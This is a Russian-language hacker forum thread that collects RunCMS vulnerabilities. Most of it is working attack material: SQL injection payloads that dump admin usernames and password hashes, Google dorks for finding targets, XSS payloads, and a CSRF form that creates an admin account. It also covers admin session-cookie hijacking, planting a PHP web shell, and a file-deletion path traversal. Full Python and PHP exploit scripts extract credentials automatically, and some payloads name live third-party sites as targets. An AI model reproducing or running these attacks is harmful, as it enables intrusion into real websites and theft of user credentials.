Просмотр полной версии : [ Обзор уязвимостей RunCMS ]
Solide Snake
20.01.2008, 04:52
Обзор уязвимостей RunCMS
Сайт производителя: www.runcms.org (http://www.runcms.org/)
Актуальная версия: 1.6.1
Exploits
Цель: RunCMS <= 1.2
Воздействие: Выполнение произвольных команд
RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit (http://milw0rm.com/exploits/1485)
Цель: RunCms 1.5.2 и более ранние версии
Воздействие: SQL-инъекция
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit (http://milw0rm.com/exploits/3850)
Цель: RunCMS <= 1.6
Воздействие: Выполнение произвольных команд
RunCMS <= 1.6 Local File Inclusion Vulnerability (http://milw0rm.com/exploits/4656)
Цель: RunCMS 1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit (http://milw0rm.com/exploits/4658)
Цель: RunCMS 1.6
Воздействие: SQL-инъекция
RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit (http://milw0rm.com/exploits/4787)
Цель: RunCMS 1.6
Воздействие: SQL-инъекция
RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion) (http://milw0rm.com/exploits/4792)
Цель: RunCMS Newbb_plus 0.92 и более ранние версии
Воздействие: SQL-инъекция
RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit (http://milw0rm.com/exploits/4845)
1. Multiple Blind SQL Injection
Attacker can inject SQL code in modules:
http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
Example:
This query will return link to download file:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
This query will return error:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
2. Stored XSS
Vulnerability found in script modules/news/submit.php in post parameter name "subject"
Example:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
subject=<script>alert("DSecRG_XSS")</script>
3. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string:
Example:
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>
3. This page can be overwritten by PHP injection:
runcms_1.6\modules\sections\cache\intro.php
runcms_1.6\modules\mylinks\cache\disclaimer.php
runcms_1.6\modules\mydownloads\cache\disclaimer.ph p
runcms_1.6\modules\newbb_plus\cache\disclaimer.php
runcms_1.6\modules\system\cache\disclaimer.php
runcms_1.6\modules\system\cache\footer.php
runcms_1.6\modules\system\cache\header.php
runcms_1.6\modules\system\cache\maintenance.php
V. 1.3a5 XSS
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]
RUNCMS 1.5.1 SQL Injection
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2
//milw0rm.com
Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php"
Пример:
http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
1) RunCMS MyAnnonces SQL Injection(cid)
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MA─░L : hackturkiye.hackturkiye@gmail.com
#
################################################## ##############
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################## ##############
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]
EXPLOIT :
for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
2) RunCMS 1.6.1 Multiple XSS and XSRF
################################################## #################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN
################################################## #################
1) Create Webmaster (admin) XSRF Vulnerability
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack@attack.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">
Also with XSRF an attacker can update the profile of all users. He can change
the password etc...
2) Cross-Site Scripting (an attacker can only attack an admin)
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
RUNCMS 1.6.1
Добавка комментария
-----------------------------
Неправильная обработка BB Code => Active XSS
Пример:
[*color]</textarea>[XSS][/*color]
Component Partner Sites 1.03 SQL Injection
(Admin priv)
Exploit:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1
Component Web Links 1.02 SQL Injection
(Admin priv)
Exploit:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1
Hashing algorithm
$pass = sha1($username.$pass);
© ZAMUT
•†•SyTiNeR•†•
21.03.2008, 09:01
RunCMS Module section (artid) Remote SQL Injection Vulnerability
Cr@zy_King
crazy_kinq@hotmail.co.uk / hackshow.us
Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91
Runcms Module Section (artid) Remote Sql İnj. Vuln.
Example :
- modules/sections/index.php?op=viewarticle&artid=Sql
- Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9, 10+from+runcms_users+where+uid=2
Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D
Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)
Good.
# milw0rm.com [2008-03-20]
SQL Injection
Vulnerable: Module Photo 3.02
Exploit:
admin
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Dork:
allinurl: "modules/photo/viewcat.php?id"
inurl:photo "powered by runcms"
© S@BUN
RunCMS Module nGuestBook 1.01 Active XSS
Add message => Message => [XSS]
dork: inurl:/modules/nguestbook/
SQL Injection
Vulnerable: Module Photo 4.00
Vuln code:
.....
include_once(PHOTO_PATH."/class/bama_cat.php");
$id = $HTTP_GET_VARS['id'];
if (isset($HTTP_GET_VARS['cid'])) {
.....
Exploit:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+u id=1
ZAMUT (c)
RunCMS Module MyArticles 0.0.4-0.5 sql-inj
Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом
http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
© H00k
~!DoK_tOR!~
27.04.2008, 05:33
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability
SQL Injection
http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]
-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
milw0rm.com
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability
Vuln code:
.....
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
.....
Exploit:
/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
Example:
http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
dork: /modules/HotNews/
ZAMUT(c)
Способ если прокатила скуля и нет возможности сбрутить хеш!
1. Регаем акк на сайте (жертва)
2. В моем случае проведенная скуль имела вид
modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7, 8,9,10+from+runcms_session+where+uid=3
Таким макаром выводим hash-session админа (не забываем про id)!
Вывело что-то в этом роде eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
3. Логонимся под реганым акком, смотрим наши куки
Примерно вот такой вид:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs %3A40%3A%22e2ef357450c7c647fa5c813808d150027340748 3%22%3Bi%3A2%3Bi%3A1212184753%
наш id = 20001
и сессия = e2ef357450c7c647fa5c813808d1500273407483
4. Меняем на id админа (в моем случае id = 00003) и сессия = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
Получаем след.:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs %3A40%3A%22e2ef357450c7c647fa5c813808d150027340748 3%22%3Bi%3A2%3Bi%3A1212184753%3B%7D
Менял куки через плагин в лисе ставил галку напротив Session cookies и обновлял страницу .
И мы в админке.
Спасибо за внимание!
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....
Exploit:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
ZAMUT (c)
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability
Vuln code:
global $HTTP_POST_VARS, $HTTP_GET_VARS, $myts;
$commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit'];
$gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid'];
Exploit:
/index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12, 13,14+from+runcms_users
ZAMUT(c)
•†•SyTiNeR•†•
09.05.2008, 10:09
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit
#!/usr/bin/python
"""
#================================================= ================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#================================================= ================================================#
# This is a public Exploit #
#================================================= ================================================#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Benchmark Method #
#================================================= ================================================#
# .-= In memory of our friend rGod =-. #
#====================================#===========# ====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# magic_quotes_gpc = 0 # Vendor: runcms.org #
# # Author: The:Paradox #
#================================================# Severity: Moderately Critical #
# # #
# Uff... I have to find something to put here... # Proud To Be Italian. #
# # #
#====================================#===========# ================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# #
# This time i'm really too lazy to write a long PoC. #
# $msg_image (but also $msg_attachment) is unproperly checked when calling store() #
# function (modules/messages/class/pm.class.php) #
# Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. #
# #
#================================================= ================================================#
[modules/messages/class/pm.class.php]
64. function store() {
65. global $db, $upload;
66.
67. if ( !$this->isCleaned() ) {
68. if ( !$this->cleanVars() ) {
69. return false;
70. }
71. }
72.
73. foreach ( $this->cleanVars as $k=>$v ) {
74. $$k = $v;
75. }
76.
77. if ( empty($msg_id) ) {
78.
79. $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');
80.
81. $sql = "
82. INSERT INTO ".$db->prefix("private_msgs")." SET
83. msg_id=".intval($msg_id).",
84. msg_image='$msg_image',
85. msg_attachment='$msg_attachment',
86. subject='$subject',
87. from_userid=".intval($from_userid).",
88. to_userid=".intval($to_userid).",
89. msg_time=".time().",
90. msg_text='$msg_text',
91. read_msg=0,
92. type='".$type."',
93. allow_html=".intval($allow_html).",
94. allow_smileys=".intval($allow_smileys).",
95. allow_bbcode=".intval($allow_bbcode).",
96. msg_replay=".intval($msg_replay)."";
97. }
98.
99. if ( !$result = $db->query($sql) ) {
100. $this->errors[] = _NOTUPDATED;
101. return false;
102. }
103.
104. return true;
105. }
#================================================= ================================================#
# There are other vulnerabilities in this CMS. Find them by yourself. #
#================================================= ================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#================================================= ================================================#
# Python Exploit Starts #
#================================================= ================================================#
"""
import urllib, urllib2
from sys import argv, exit
main = """
#================================================= ===============#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Discovered By The:Paradox #
# #
# rGod is still alive in our hearts #
# #
# Usage: #
# ./homerun [Target+path] [TargetUid] [ValidUserCookie] #
# ./homerun --help (to print an example) #
#================================================= ===============#
"""
prefix = "runcms_"
if len(argv)>=2 and argv[1] == "--help":
print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40% 3A%228b394462d67198707aea362098001610d35687ff%22%3 Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"
else: print main
if len(argv)<=3: exit()
else: print "[.] Exploit Starting."
host = argv[1]
tuid = argv[2]
cookie = argv[3]
try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]
except: exit("[-] Invalid cookie")
sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"
print "[+] Sending HTTP Request..."
values = {'subject' : 'Master attack failed.',
'message' : 'Probably mq = 1 or system patched.',
'allow_html' : 0,
'allow_smileys' : 1,
'allow_bbcode' : 0,
'msg_replay' : 1,
'submit' : '1',
'msg_image' : sql,
'to_userid' : uid }
headers = {'Cookie' : cookie,
'Content-Type' : 'application/x-www-form-urlencoded'}
req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)
response = urllib2.urlopen(req)
if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"
else: print "[-] Unable to send message"
# milw0rm.com [2008-05-08]
в админке
Читалка (все версии).
конфиг к бд
http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php
можно троянить все странички cms:
Тут радактируем хидер либо футер, как нам нужно, я вставлял ифр :)
http://localhost/runcms/modules/system/admin.php?fct=meta-generator
ну и хз за чем они нужны, но пусть будут. SQL-inj.
/modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users
/modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users
ZAMUT (c)
Заливка шелла в RunCMS
через Meta-Generator
Уязвимый кусок кода:
.......
$content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
$content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
$content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
.......
write_file("meta", $content, "w");
Идем в:
http://localhost/runc/modules/system/admin.php?fct=meta-generator
поле Bookmark Icon имеет вид:
../../favicon.ico
правим так:
../../favicon.ico";echo `$_REQUEST[c]`;#
теперь файл с этой опцией (\modules\system\cache\meta.php) выглядит так:
.........
$meta['rating'] = "general";
$meta['p3p'] = "";
$meta['index'] = "index";
$meta['follow'] = "follow";
$meta['pragma'] = "";
$meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
.........
Т.е. классический php-injection, как видим теперь все зависит от нашей фантазии :)
используем так:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir
Имхо, метод вообще безпалевный (когда юзать будем POST) ;)
Так же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif )
ZAMUT (c)
Solide Snake
26.06.2008, 18:57
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit
<?php
print_r('
--------------------------------------------------------------------------
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials
disclosure exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
dork: "Runcms Copyright" "2002 - 2007" +"page created"
---------------------------------------------------------------------------
');
/*
software site: http://www.runcms.org/modules/news/
vulnerable code in /class/debug/debug_show.php:
<?php
...
include_once("../../mainfile.php");
include_once("../../header.php");
switch($_POST['debug_show']) {
case "show_files":
show_files($_POST['loaded_files']);
break;
case "show_queries":
show_queries($_POST['executed_queries'], $_POST['sorted']);
break;
}
include_once("../../footer.php");
?>
no authentication is performed to run show_files() and show_queries()
functions, look at this now in /class/debug/debug.php:
...
function show_queries($executed_queries, $sorted=0)
{
global $db;
$executed_queries = unserialize(urldecode($executed_queries));
if ($sorted == 1)
{
sort($executed_queries);
$is_sorted = _DBG_SORTEDR;
}
else
{
array_reverse($executed_queries);
$is_sorted = _DBG_NSORTEDR;
}
OpenTable();
$fulldebug = "
<h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
<table width='100%' cellpadding='3' cellspacing='1'>";
$size = count($executed_queries);
for ($i=0; $i<$size; $i++)
{
$stime = get_micro_time();
$query = $db->query("EXPLAIN ".$executed_queries[$i]."");
$querytime = (get_micro_time() - $stime);
$totaltime += $querytime;
$fulldebug .= "<tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
<td colspan='7' class='bg3'>$executed_queries[$i]</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
<td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
<td nowrap='nowrap' class='bg2'><b>ref:</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
</tr>";
while ($result = $db->fetch_array($query))
{
$fulldebug .= " <tr>
<td class='bg3' nowrap='nowrap' {$result['table']} </td>
<td class='bg3' nowrap='nowrap' {$result['type']} </td>
<td class='bg3'>{$result['possible_keys']} </td>
<td class='bg3' nowrap='nowrap' {$result['key']} </td>
<td class='bg3' nowrap='nowrap' {$result['key_len']} </td>
<td class='bg3' nowrap='nowrap' {$result['ref']} </td>
<td class='bg3' nowrap='nowrap' {$result['rows']} </td>
<td class='bg3'>{$result['Extra']} </td>
</tr>";
}
$fulldebug .= "<tr>
<td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
</tr>";
}
$fulldebug .= "</table>";
echo $fulldebug;
CloseTable();
}
...
we have a nice kind of sql injection here!
also show_files function can be used to check the existence of certain files
and retrieve the filesize or if it has been modified and so on...
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to runcms
Options:
-p[port]: specify a port other than 80
-P[ip:port]: "" a proxy
-T[prefix] "" a table prefix (default: runcms)
Example:
php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80
php '.$argv[0].' localhost / -Trcms -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function send($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
$parts[1]=(int)$parts[1];
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="runcms";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
echo "md5 hash -> ";
$j=1;$password="";
while (!strstr($password,chr(0))){
for ($i=0; $i<=255; $i++){
if (in_array($i,$md5s)){
$executed_queries=array();
//original query: EXPLAIN ...
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
echo "\n";
echo "admin username -> ";
$j=1;$admin_user="";
while (!strstr($admin_user,chr(0))){
for ($i=0; $i<=255; $i++){
$executed_queries=array();
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
?>
original url: http://retrogod.altervista.org/runcms_152_sql.html
Как узнать версию ?
/index.php
<meta name="robots" content="index, follow" />
<meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" />
<meta name="keywords" content="enter your keywords here" />
<meta name="description" content="Enter your site description here" />
RunCMS Module Upload Center Delete File Vulnerability
version: latest -- 1.01
Showing list files Vulnerability
Vuln Code:
/folder.php
function listfiles() {
global $ucConfig, $xoopsUser, $_GET;
if (!$xoopsUser) {
header("Location:".XOOPS_URL."/whyregister.php");
}
else {
$foldername = $_GET['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
$userfolderpath = "./cache/files/".$userfoldername;
$imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
$imgpath = "./cache/files/".$userfoldername."/".$foldername;
$subfolderpath = $userfolderpath."/".$foldername;
$total = dir_stats($userfolderpath);
.....
Delete File Vulnerability
Vuln Code:
/folder.php
function deletefile() {
global $xoopsUser, $_POST;
$filename = $_POST['filename'];
$foldername = $_POST['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
@unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
}
}
<form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
<input type="hidden" name="foldername" value="../../../../../" /><input type="hidden" name="filename" value=".htaccess" />
<input type="submit" class="button" value="Delete"></td></form>
ZAMUT ©
Ded MustD!e
16.12.2008, 01:05
RunCMS Module eCal 2.4 Blind-SQL
Уязвимый продукт: Module eCal
Версия: <= 2.4
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=95
Дорк: "inurl:modules/ecal/"
Blind-SQL
Уязвимость в файле localleve.php.
Уязвимый кусок кода:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp");
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
Exploit:
true: /modules/ecal/localleve.php?lid=1+and+1=1
false: /modules/ecal/localleve.php?lid=1+and+1=2
Example:
true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5
false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
Ded MustD!e
16.12.2008, 01:17
RunCMS Module eBlog 0.1 Blind-SQL
Уязвимый продукт: Module eBlog
Версия: <= 0.1
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165
Дорк: "inurl:modules/eblog/"
Blind-SQL
Уязвимость в файле index.php.
Уязвимый кусок кода:
$result = $db->query("select cat_blogid from ".$db->prefix(eblog_cat)." where cat_id=$cat") or $eh->show("0013");
Exploit:
true: /modules/eblog/index.php?cat=1+and+1=1
false: /modules/eblog/index.php?cat=1+and+1=2
Example:
true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5
false: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=4
BlackSun
19.02.2009, 08:52
XtremGuestbook
Версия: 1.2
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=194
SQL-INJ
Уязвимый скрипт: /modules/xtremuserguestbook/index1.php
